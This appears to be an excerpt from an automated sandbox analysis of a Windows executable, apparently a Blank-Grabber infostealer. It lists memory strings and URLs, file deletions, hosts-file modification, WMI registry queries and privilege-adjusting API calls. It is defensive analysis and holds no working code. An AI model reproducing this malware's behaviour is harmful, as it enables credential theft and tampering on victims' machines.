Source: sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617193305.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1484130042.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1744930553.0000018C014AB000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749404493.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1515784101.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1450803284.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1495682186.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1743024456.0000018C7F727000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1465225633.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: sppawx.exe, 00000002.00000002.1748349929.0000018C7F317000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: sppawx.exe, 00000002.00000003.1517272348.0000018C7F6B9000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452098509.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748973373.0000018C7F6BA000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
Source: sppawx.exe, 00000002.00000003.1323503885.0000018C7F34E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C025B8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C025D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 0000000B.00000002.1419951585.000002724448A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1597118596.000001AF4C7D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1539735870.000001AF3E1B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000044.00000002.1539735870.000001AF3DD64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000044.00000002.1539735870.000001AF3DD64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1745892024.0000018C01C50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: sppawx.exe, 00000002.00000002.1748216532.0000018C7F190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: sppawx.exe, 00000002.00000002.1754174414.00007FFEDDF24000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: sppawx.exe, 00000002.00000002.1747906532.0000018C7EF90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: sppawx.exe, 00000002.00000003.1485918071.0000018C7F864000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1494582448.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1485012431.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469162238.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469162238.0000018C7F864000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1493885361.0000018C7F864000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1463956124.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: sppawx.exe, 00000002.00000003.1452445176.0000018C7F841000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1444563764.0000018C7F840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/custoU
Source: sppawx.exe, 00000002.00000003.1452445176.0000018C7F89E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: sppawx.exe, 00000002.00000003.1452445176.0000018C7F89E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452445176.0000018C7F841000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469162238.0000018C7F842000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1444563764.0000018C7F840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.Qb0WswhkLhoa
Source: sppawx.exe, 00000002.00000002.1748349929.0000018C7F317000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: sppawx.exe, 00000002.00000002.1748349929.0000018C7F296000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1324714906.0000018C7F2F3000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1325603169.0000018C7F291000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: sppawx.exe, 00000002.00000003.1517272348.0000018C7F6B9000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452098509.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F0B2000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1444563764.0000018C7F787000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F787000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748973373.0000018C7F6BA000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: sppawx.exe, 00000002.00000002.1746134120.0000018C01E80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: sppawx.exe, 00000002.00000002.1745991860.0000018C01D70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02560000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.ca/
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: sppawx.exe, 00000002.00000003.1485918071.0000018C7F864000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1494582448.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1485012431.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469162238.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469162238.0000018C7F864000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1493885361.0000018C7F864000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1463956124.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02574000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/
Source: sppawx.exe, 00000002.00000003.1452445176.0000018C7F89E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452445176.0000018C7F841000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1444563764.0000018C7F840000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.8Z86fTxZfkM6
Source: sppawx.exe, 00000002.00000003.1452445176.0000018C7F89E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452445176.0000018C7F841000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1444563764.0000018C7F840000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.UnUp0v0CLe9Y
Source: sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: sppawx.exe, 00000002.00000003.1452445176.0000018C7F89E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1494582448.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1454049976.0000018C7F833000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1485012431.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1458853626.0000018C7F833000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469162238.0000018C7F833000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02574000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02560000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1754087915.00007FFEDD939000.00000004.00000001.01000000.0000000A.sdmp, sppawx.exe, 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: sppawx.exe, 00000002.00000002.1747645212.0000018C7ECE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: sppawx.exe, 00000002.00000002.1754174414.00007FFEDE022000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.python.org/psf/license/
Source: sppawx.exe, 00000002.00000002.1754174414.00007FFEDDF24000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.python.org/psf/license/)
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: sppawx.exe, 00000002.00000003.1451486952.0000018C7F704000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1744930553.0000018C01430000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02560000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617193305.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1484130042.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1744930553.0000018C014AB000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749404493.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1515784101.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1450803284.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1495682186.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1743024456.0000018C7F727000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1465225633.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\sppawx.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\FACWLRWHGG.jpg	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\AFWAAFRXKO.jpg	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\AFWAAFRXKO.jpg	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\AIXACVYBSB.mp3	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\AIXACVYBSB.mp3	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\sppawx.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: cmd.exe

Process created: 73

System Summary

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe

Code function: 103_2_00007FF6256CD2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

103_2_00007FF6256CD2C0

Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe

Code function: 103_2_00007FF6256FB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,

103_2_00007FF6256FB57C

Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A318BD0	0_2_00007FF79A318BD0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A3369D4	0_2_00007FF79A3369D4
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A311000	0_2_00007FF79A311000
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A31A34B	0_2_00007FF79A31A34B
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A321BC0	0_2_00007FF79A321BC0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A335C70	0_2_00007FF79A335C70
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A322C80	0_2_00007FF79A322C80
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A333C80	0_2_00007FF79A333C80
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A336488	0_2_00007FF79A336488
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A330938	0_2_00007FF79A330938
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A31A4E4	0_2_00007FF79A31A4E4
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A33411C	0_2_00007FF79A33411C
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A330938	0_2_00007FF79A330938
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A328154	0_2_00007FF79A328154
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A323A14	0_2_00007FF79A323A14
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A3219B4	0_2_00007FF79A3219B4
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A3221D4	0_2_00007FF79A3221D4
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A32DACC	0_2_00007FF79A32DACC
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A32DF60	0_2_00007FF79A32DF60
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A328804	0_2_00007FF79A328804
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A339798	0_2_00007FF79A339798
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A3217B0	0_2_00007FF79A3217B0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A321FD0	0_2_00007FF79A321FD0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A319870	0_2_00007FF79A319870
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A3318E4	0_2_00007FF79A3318E4
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A31AD1D	0_2_00007FF79A31AD1D
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A32E5E0	0_2_00007FF79A32E5E0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A323610	0_2_00007FF79A323610
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A325DA0	0_2_00007FF79A325DA0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A321DC4	0_2_00007FF79A321DC4
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A335EEC	0_2_00007FF79A335EEC
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A329F10	0_2_00007FF79A329F10
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A3369D4	2_2_00007FF79A3369D4
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A311000	2_2_00007FF79A311000
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A31A34B	2_2_00007FF79A31A34B
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A321BC0	2_2_00007FF79A321BC0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A318BD0	2_2_00007FF79A318BD0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A335C70	2_2_00007FF79A335C70
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A322C80	2_2_00007FF79A322C80
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A333C80	2_2_00007FF79A333C80
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A336488	2_2_00007FF79A336488
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A330938	2_2_00007FF79A330938
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A31A4E4	2_2_00007FF79A31A4E4
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A33411C	2_2_00007FF79A33411C
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A330938	2_2_00007FF79A330938
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A328154	2_2_00007FF79A328154
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A323A14	2_2_00007FF79A323A14
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A3219B4	2_2_00007FF79A3219B4
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A3221D4	2_2_00007FF79A3221D4
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A32DACC	2_2_00007FF79A32DACC
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A32DF60	2_2_00007FF79A32DF60
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A328804	2_2_00007FF79A328804
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A339798	2_2_00007FF79A339798
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A3217B0	2_2_00007FF79A3217B0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A321FD0	2_2_00007FF79A321FD0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A319870	2_2_00007FF79A319870
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A3318E4	2_2_00007FF79A3318E4
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A31AD1D	2_2_00007FF79A31AD1D
